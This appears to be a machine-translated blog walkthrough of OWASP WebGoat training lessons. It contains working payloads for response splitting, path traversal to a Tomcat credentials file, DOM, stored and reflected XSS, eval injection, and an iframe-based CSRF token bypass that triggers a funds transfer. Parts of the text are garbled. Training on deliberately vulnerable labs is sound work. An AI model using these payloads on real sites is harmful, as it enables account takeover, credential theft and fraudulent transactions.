Webgoat Topic solution (GENERAL~XSS)

general*************************************************************

1. Http spliting
Step1

Cn%0acontent-length:%200%0a%0ahttp/1.1%20200%20ok%0acontent-type:%20text/html%0acontent-length:30%0a
Step2
Add the last-modified header, set the expiration time of the server page, and note the format of the date.
cn%0acontent-length:%200%0a%0ahttp/1.1%20200%20ok%0alast-modified:%20thu,%2001%20jan%204099%2012:00:00%20gmt% 20%20%20%0acontent-type:%20text/html%0acontent-length:30%0a

Access Control flaws**************************************************

1. Bypass a Path Based Access Control Scheme
.. /.. /.. /.. /.. /.. /.. /etc/tomcat6/tomcat-users.xml
Currently in the number of levels directory, there are how many: You can go to the root directory.

AJAX security*********************************************************
1, lab:dom-based cross-site scripting
Step1
</img>
Submit
Step2
</img> onMouseOver ...
<a onclick= "Javascript:alert (/xss/)" >haha</a>
Onmouseover/onmouseout ...
<a onclick= "Javascript:eval (document.location.href= ' http://www.baidu.com ')" >haha</a>
Step3
<iframe src= "Javascript:alert (/xss/)" ></iframe>
Step4
Please enter your password:<br><input type= "password" id= "passwd" ><br><button onclick= " Javascript:alert (' I Have your password: ' + pass.value); " >Submit</button>
Can customs clearance, but Pass.value will error.
Step5
Edit/owaspbwa/webgoat-svn/target/webgoat-5.4+svn/javascript/domxss.js to add the escapehtml function to name.
function displaygreeting (name) {if (name! = ") {document.getElementById (" greeting "). Innerhtml=" Hel Lo, "+ escapehtml (name);        + "!"; }
After encoding, it becomes
2, Lab:client Side Filtering
Step1
By crawling Ajax data with WebScarab, you can find data for 12 employees.
3. XML Injection
4. JSON Injection
Use WebScarab to crawl XML, JSON data directly to modify.
5, Silent transactions Attacks
Analyze the script code to know that Ajax calls SubmitData (Accountno, balance) function transfer, you can call this function directly to transfer money. In the browser input:
Javascript:submitdata (666,10000)
6. Dangerous use of Eval
123 "'); alert (document.cookie);//
Alert (' whoops:you entered an incorrect access code of "123" '); alert (document.cookie);/"';
7, Insecure Client Storage
Step1
Firebug Debug Clientsidevalidation.js, set a breakpoint at 42 line return Caesar, run continuously to discover all coupon code:
Platinum Gold Pressone Presstuo
Enter any one to pass
Step2
Using WebScarab to crawl the Ajax return package, the modified return value is 0 to complete.

Authentication flaws*************************************************************
1. Basic Authentication
Step1
View the request header to know.
Step2
1. Use WebScarab to remove authentication headers and cookies (you must also delete these two).
2. Log in with Basic:basic in the returned login box.
3, delete the value of the cookie at this time, that is, return a brand-new webgoat.
4. Choose this course to pass.
2. Multi Level Login 2
Log in as Joe/banana and enter the specified tan to inquire about your information. At this point, the value of Hidden_user to send the request through WebScarab is Jane.
3. Multi level Login 1
Ditto, modify the value of the Hidden_tan.

Buffer overflows********************************************************************

1, Off-by-one overflows
Use Burpsuite injection.

Code quality*************************************************************************

1. Discover Clues in the HTML
View HTML source code, search <! can find:
<!--fixme ADMIN:ADMINPW--><!--use admin to regenerate database--

Cross-site Scripting (XSS) ***********************************************************

1. Phishing with XSS
To construct form forms:
 
 </form><br><br><br>
      Through the proxy can you see that http://xx.xx.xx.xx/webgoat/Catcher is actually sent to the server? Property=yes&user=xx&password=xx&submit=login request, but the requested content does not exist!!!!!!! 
 2, Lab:cross Site Scripting 
     step1 
          Edit Tom's profile, Modify the street section to: <script>alert (/xss/) <script>, and then use Jerry Login to view Tom's profile to complete the course. You can also modify other fields. 
     step3 
 3, Stored XSS Attacks 
      Enter <script>alert in the message box (/xss/) </script> can. 
 4, reflected XSS Attacks 
      Observe that Updatecart purchase all submit data with post, but enter your credit card number: and enter your three digit access code: The value is returned as it was post, so you can construct JS in 
      here. <script>alert (/xss/) </script> 
 5, Cross Site Request forgery (CSRF) 
      XSS with stored      
6, CSRF Prompt By-Pass
 7, CSRF Token by-pass 
     a, open the Funds Transfer page: Add transferfunds=main parameters after the URL. 
     b, view page source code, found: <input type= "hidden" value= " -953910496" name= "Csrftoken"; 
     c, tectonic payload. The key is to first add the parameters Transferfunds=main Open the transfer page to get the Csrftoken of the page. 
      
<script>    var tokenvalue;    function readframe1 ()     {    var framedoc = document.getelementbyid ("Frame1 "). Contentdocument;    var form = framedoc.getelementsbytagname (" form ") [1];     var token = form. csrftoken.value;    tokenvalue =  ' &csrftoken= ' +token;     loadframe2 ();     }    function loadframe2 ()      {    var testframe = document.getelementbyid ("frame2");     testframe.src= "Http://xx.xx.xx.xx/WebGoat/attack? screen=838&menu=900&transferfunds=4000 "+tokenvalue;    } </script>     <iframe src= "Http://xx.xx.xx.xx/WebGoat/attack? Screen=838&menu=900&transferfunds=main"    onload=" readFrame1 (); "     id= "Frame1"  frameborder= "1"  marginwidth= "0"      marginheight= "0"  width= "1"  scrolling=yes height= "1" ></iframe>     <iframe id= "Frame2"  frameborder= "1"  marginwidth= "0"     marginheight= "0"  width= "1"  scrolling=yes height= "1" ></iframe>

This article is from the "Technology No Peak" blog, please be sure to keep this source http://shelia.blog.51cto.com/2930476/1626479
Webgoat Topic solution (GENERAL~XSS)